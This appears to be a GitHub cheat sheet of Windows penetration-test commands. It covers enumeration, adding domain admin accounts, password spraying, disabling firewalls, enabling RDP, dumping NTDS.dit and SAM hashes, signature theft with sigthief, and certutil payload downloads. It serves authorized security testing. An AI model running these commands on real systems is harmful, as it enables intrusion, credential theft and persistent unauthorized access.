WindowsPentestCommands

Commands used in Windows penetration tests

Checking version

Run systeminfo on the target. There are 2 things to check: the system version (e.g. 10.0.17134) and the cumulative patches installed (KB).

Before October 2016 patches were individual. After this date, patches are cumulative: the most recent KB installed has all the patches between October 2016 and the KB's release date.

If the windows base system predates October 2016, you need to both check :

if important older (pre-2016) KBs are missing, use https://github.com/GDSSecurity/Windows-Exploit-Suggester
if the most recently installed KB is up-to-date

If the windows base system postdates October 2016, checking the most recent KB installed is enough.

Listing disks

wmic logicaldisk get

List running services

GUI: services.msc

net start
sc query
wmic service get

List running processes

tasklist
wmic process

Stopping a process

taskkill /PID 10032 /F

Listing runkeys

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

Listing scheduled tasks

GUI: taskschd.msc

Powershell (limited information):

Get-ScheduledTask
Get-ScheduledTaskInfo

Powershell (detailed information; Warning: need to be SYSTEM to see all tasks):

Get-ScheduledTask -TaskPath "\" |
    ForEach-Object { [pscustomobject]@{
     Server = $env:COMPUTERNAME
     Name = $_.TaskName
     Path = $_.TaskPath
     Description = $_.Description
     Author = $_.Author
     RunAsUser = $_.Principal.userid
     LastRunTime = $(($_ | Get-ScheduledTaskInfo).LastRunTime)
     LastResult = $(($_ | Get-ScheduledTaskInfo).LastTaskResult)
     NextRun = $(($_ | Get-ScheduledTaskInfo).NextRunTime)
     Status = $_.State
     Command = $_.Actions.execute
     Arguments = $_.Actions.Arguments }}

Listing users

Get current user info

whoami
whoami /groups

List local users

net user

Get local user info

net user <username>

List domain users

net user /domain

Get domain user info

net user <username> /domain

Adding users

Locally

net user /add kek ABCabc123
net localgroup Administrators kek /add

Note: always use a strong password when on a webshell or reverse shell because you may not be able to see errors.

Domain

Use this after elevating your kerberos privileges for instance:

net user kek ABCabc123 /add /domain 
net group "Domain Admins" kek /add /domain

Permissions

Listing permissions

icacls C:\Windows\SYSVOL\whatever

Granting permissions

icacls C:\Windows\SYSVOL\whatever /grant "NT AUTHORITY\Authenticated Users":F

Capturing packets

netsh trace start persistent=yes capture=yes tracefile=C:\Users\whatever\trace.etl
netsh trace stop

Run a command as another user

runas /user:domain\user cmd.exe

Password spraying

This will pop a cmd for each pwned account:

for /f %i in (users.txt) do @(echo %i && PsExec.exe -u domain\%i -p P@ssw0rd cmd.exe)

Running remote commands

psexec \\remotecomputer.domain -u domain\user -p password ipconfig
winrs -r:remotecomputer cmd
wmic /node:remotecomputer process call create "cmd.exe /c start.exe"

Downloading a payload

certutil -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip

Decode a base64 payload

certutil -decode test.exe.b64 test.exe

Check open ports

This one is powershell:

tnc \\computer.domain -p 80
tnc 10.0.0.1 -p 443

Firewall

On older platforms (XP):

netsh.exe firewall set opmode mode=disable profile=all

On newer platforms:

netsh advfirewall set currentprofile state off

Enable RDP

Authorizing the service

reg add "HKLM\SYSTEM\CurrentControlSet\services\TermService" /v Start /t REG_DWORD /d 3 /f
sc config termservice start= auto

Starting the service

net start TermService

Authorize remote connections

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

At this point verify that the service is indeed listening:

netstat -a -p TCP

Dumping NTDS.dit

The preferred method is:

ntdsutil "ac i ntds" "ifm" "create full c:\.svg" q q

This might fail so you could use a disk shadow copy instead:

vssadmin create shadow /for=c:

Extract hashes:

impacket-secretsdump -ntds /path/Active\ Directory/ntds.dit -system /path/registry/SYSTEM LOCAL

Forging Binary Signatures

Using Visual Studio : >Windows> Developer Command Prompt for VS2017 Signtool : command-line tool that digitally signs/unsigns files, verifies signatures in files, or timestamps files

signtool sign /a /t C:\Path\To\Signature\signature.dll /v "C:\Path\To\The\File\file.exe"
signtool remove /s /v C:\Path\To\DLL\file.dll

Using Sigthief : Take a signature from a binary to another :

/sigthief.py -i ~/SignFromThisDll.dll -t ~/toThisDll.dll -o ~/FileWithBadSign.dll

Files to get via LFI

Check if the LFI works:

C:\Windows\win.ini

Fingerprinting the version:

C:\Windows\System32\eula.txt      (XP)
C:\Windows\System32\license.rtf   (Vista and above)

Dump the SAM base:

C:\WINDOWS\Repair\SAM
C:\WINDOWS\Repair\SYSTEM

xorgx304 / windowspentestcommands Goto Github PK